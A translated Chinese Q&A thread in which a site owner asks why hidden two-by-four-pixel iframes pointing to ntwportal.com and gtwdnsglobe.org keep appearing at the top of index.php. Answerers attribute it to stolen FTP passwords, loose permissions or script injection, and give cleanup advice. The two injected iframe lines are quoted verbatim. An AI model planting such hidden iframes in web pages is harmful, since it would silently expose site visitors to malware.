我曾两次在 index.php 的顶部发现奇怪的代码。
第一次是这样的:
<iframe src="http://ntwportal.com/" width="2" height="4"></iframe>
然后是这个:
<iframe src="http://gtwdnsglobe.org/" width="2" height="4"></iframe>
这是怎么回事?我的安全漏洞是否存在?
任何拥有 FTP 访问权限的人(据我所知)都不会这样做。我最近部署了一个新网站,但这种情况仍然发生。
答案1
可能是病毒。
http://www.google.com/safebrowsing/diagnostic?site=http://ntwportal.com/&hl=en
HTML 是否也位于您的本地计算机上?您可能已插入病毒。否则,请检查主机的安全性,它可能已被入侵。
答案2
是的,你被黑客入侵了,通常是俄罗斯成人网站管理员所为。这些网站目前处于瘫痪状态,但它们是已知的感染媒介。
当您从服务器重新下载 .php 文件时,iframe 代码是否位于 .php 文件本身中,还是仅位于其输出中?
在前一种情况下,要么是服务器本身受到了威胁(是您的服务器还是第三方的服务器?),要么是您在设置权限时松懈,导致网络服务器用户可以写入文件,或者 — — 我认为在这种情况下更有可能 — — 您或其他有 FTP 访问权限的人员的密码被木马病毒窃取,而这些木马病毒会通过另一个网站上的类似感染而获得。
在后一种情况下,如果你的 PHP 脚本存在应用程序级别的漏洞(SQL 和脚本注入,这是极其这在编写糟糕的 PHP 中很常见),或者,如果源或数据库中没有任何迹象,那么它可能再次是服务器级别的妥协。
彻底清除网站,确保您的机器是干净的 (*),更改密码,并停止使用 FTP。本世纪没有理由不迁移到 SFTP。
(*:不要因为你有一个杀毒软件就以为你的机器是干净的。当今的杀毒软件在检测和清除恶意软件方面几乎毫无用处。如果你过去曾受到过漏洞攻击,那么你很可能仍然感染了杀毒软件未捕获的病毒。)
答案3
如果您在页面上接受任何类型的输入,请确保正确转义。听起来像是脚本注入的情况。如果您正在寻找更多信息,搜索 SQL 注入、脚本注入或跨站点脚本应该会得到一些结果。
答案4
当我输入“http://ntwportal.com/“在 Google 中,avast 用病毒警告阻止我查看搜索结果。您的 FTP 可能以某种方式受到损害。您应该重新安装所有内容并更改所有密码。